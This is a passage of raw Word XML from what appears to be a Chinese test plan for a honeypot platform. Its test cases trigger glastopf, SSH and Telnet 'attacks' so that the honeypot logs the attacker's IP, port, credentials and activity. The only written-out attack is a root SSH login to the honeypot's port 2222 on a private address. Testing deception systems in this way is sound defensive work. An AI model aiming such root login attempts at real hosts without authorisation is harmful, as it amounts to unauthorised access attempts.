                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B12870D" wp14:editId="30D3CEDF">
                  <wp:extent cx="4104005" cy="2038985"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1841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87"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2038985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="21699E24"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48B40FFC" wp14:editId="3ED6219F">
                  <wp:extent cx="4104005" cy="881380"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="762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88"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="881380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BE48D76"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D499E4" wp14:editId="7220A474">
                  <wp:extent cx="4104005" cy="844550"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1905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89"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="844550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A13E586" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>以上图表可以看到详细攻击端口及日志。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285910AF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>页面上数据插件导航栏可以看到</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>es</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的信息，如图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE1DC97"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6951F42B" wp14:editId="0811038B">
                  <wp:extent cx="4104005" cy="942340"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2286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90"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="942340"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D896F3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>集群管理导航栏查看宿主机的docker信息，如图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A23B91F"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0FC1B0E2" wp14:editId="14AB8939">
                  <wp:extent cx="4104005" cy="1896745"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="825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91"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1896745"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7781DA16" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主机监控导航栏查看宿主机资源使用情况，如图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B98798C"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13BC0F40" wp14:editId="30A1BEED">
                  <wp:extent cx="4104005" cy="2184400"/>
                  <wp:effectExtent l="0" t="0" r="10795"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92"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2184400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2A319AD8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FDC6C8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FBFBFE5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>触发glastopf事件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6139A836" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C0E249D"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559F7433" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BF6F7BB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="_Toc36487961"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00536672">
        <w:t>蜜罐网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00536672">
        <w:t>ssh攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>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007A2E19" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C8AB226"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7FE14753" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>蜜罐网</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ssh攻击场景测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1BB9E7BC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A471AC5"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44DADF6B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="52535DA1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45FBE54C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B9871D1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="532513F9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="633BC952"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07A734D8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A30515" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击方式：</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ssh root@192.168.1.194 -p2222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D06BC76" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>暴露端口：2222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3678DFCC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>后如下</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>图，可以看到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562E625C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4826582C" wp14:editId="0211742B">
                  <wp:extent cx="4104005" cy="1217295"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="190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93"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1217295"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C8047AD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72A24379" wp14:editId="56037F74">
                  <wp:extent cx="4104005" cy="2159635"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2476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94"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2159635"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="704A9308" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3D77B4" wp14:editId="54262A2D">
                  <wp:extent cx="4104005" cy="2160905"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2349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95"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2160905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F79C47" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572CEEDE" wp14:editId="71D4916A">
                  <wp:extent cx="4104005" cy="1345565"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="63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96"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1345565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="71335217" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58E137C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6C0AC107" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="507C1305"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42F27F4F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>得到攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0BC6AB29" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739C26BF"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48875B4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FA105FB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="_Toc36487962"/>
      <w:r w:rsidRPr="00536672">
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>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50025FFF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6F4FF7"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2C5B9225" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="44B1BEA4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06298937"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0281B2B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>发起攻击，捕获攻击的ip、端口号、账号、密码及详细日志等信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="15CBBF24" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71EB8134"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72C8A0BF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
